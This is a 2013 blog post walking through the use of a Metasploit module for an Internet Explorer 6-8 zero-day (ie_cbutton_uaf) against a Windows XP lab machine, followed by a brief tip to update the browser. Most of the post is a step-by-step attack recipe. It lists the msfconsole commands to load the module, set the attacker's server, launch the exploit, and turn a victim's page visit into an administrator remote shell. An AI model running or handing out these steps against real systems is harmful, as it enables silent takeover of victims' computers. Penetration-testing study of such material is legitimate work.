Latest Internet Explorer Zero-Day Exploit Walkthrough using Metasploit

IE Zero Day 2

The end of the year saw several zero day exploits being released. One for RealPlayer version 15 and under, one for Nvidia Video Cards, and what we will focus on today, a remote exploit for Internet Explorer Version 6-8. The Internet Explorer Zero-Day exploit that was publicly acknowledged on December 29th, affects Windows XP SP3, Vista, Windows 7 and Server 2003 and 2008. Systems running IE 9 and 10 are not affected.

The exploit code has been publicly released and has already been added to Metasploit. We will demonstrate the exploit using Backtrack 5r3 and a Windows XP sp3 system.

So let’s get started.

  • Boot up your Backtrack 5 system and run the msfupdate command to make sure you get the latest exploits.

(Had a heck of a time with running the updates lately. Most recently it seemed to hang on updating an outlook.rb file. I got by it earlier by deleting the file and re-running the update. But for this example we won’t be needing it, so you can just hit (p) for postpone if it hangs on updating it.)

  • Next start the msfconsole.
  • Now you can search for the internet explorer exploit by typing “search internet explorer” or by just typing it in as below.

At the msf> prompt type:

  • use exploit/windows/browser/ie_cbutton_uaf

Then type “show options” to see what options can be set:

IE Zero Day 2

Okay, we will need to set the SRVHOST option to point to our Backtrack system. And we can change the URIPATH to something else other than random if we want. But first, let’s set the target as it defaults to Windows 7, and our target in this example is a Windows XP system:

IE Zero Day 1

Next, set the IP address of your Backtrack system:

  • set SRVHOST 192.168.0.120

And finally run the exploit:

  • exploit

IE Zero Day 4-1

Okay, at this point Metasploit starts up the Apache web server,creates the exploit and creates a random page to host it on. Now all we need is to surf to the URL given to us by Backtrack 5 using Internet Explorer on the Windows XP system:

IE Zero Day 3

That is it!

As soon as the user surfs to our Backtrack page, the exploit is run and a remote session is created:

IE Zero Day 4-2

(Note: There were no real warnings or alerts on the Windows XP side. It just seemed that the webpage didn’t do anything.)

We can type “sessions -l” to list all the remote shell sessions that Backtrack has created.

IE Zero Day 5

As you can see our Windows XP session is listed. Now if we simply connect to the session interactively (sessions -i 1), and run “getuid” we see that we have an administrator level shell:

IE Zero Day 6

And simply running “shell” drops us into the full remote shell:

IE Zero Day 7

So how do we stop this attack? If you are running older versions of Internet Explorer, UPDATE NOW! This attack does not work against the latest version of IE. Microsoft was supposed to release a patch for older IE versions today, to stop this attack, but they didn’t do it.

And with the fix really being to simply upgrade to the newest version, they probably won’t any time soon.

The fix is also the same with the RealPlayer and Nvidia Zero-days that I mentioned earlier. Simply download the latest updates of the software to protect against the exploits.

About these ads

~ by D. Dieterle on January 8, 2013.

2 Responses to “Latest Internet Explorer Zero-Day Exploit Walkthrough using Metasploit”

  1. [...] to Microsoft, the issue is “under limited exploit in the wild”; however, there is a Metasploit module available which can theoretically exploit the [...]

  2. [...] Laut Microsoft wurde die Schwachstelle nur in wenigen Fällen ausgenutzt. Allerdings gibt es ein Metasploit-Modul, mit dem theoretisch jeder die Lücke ausnutzen [...]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
Follow

Get every new post delivered to your Inbox.

Join 274 other followers

%d bloggers like this: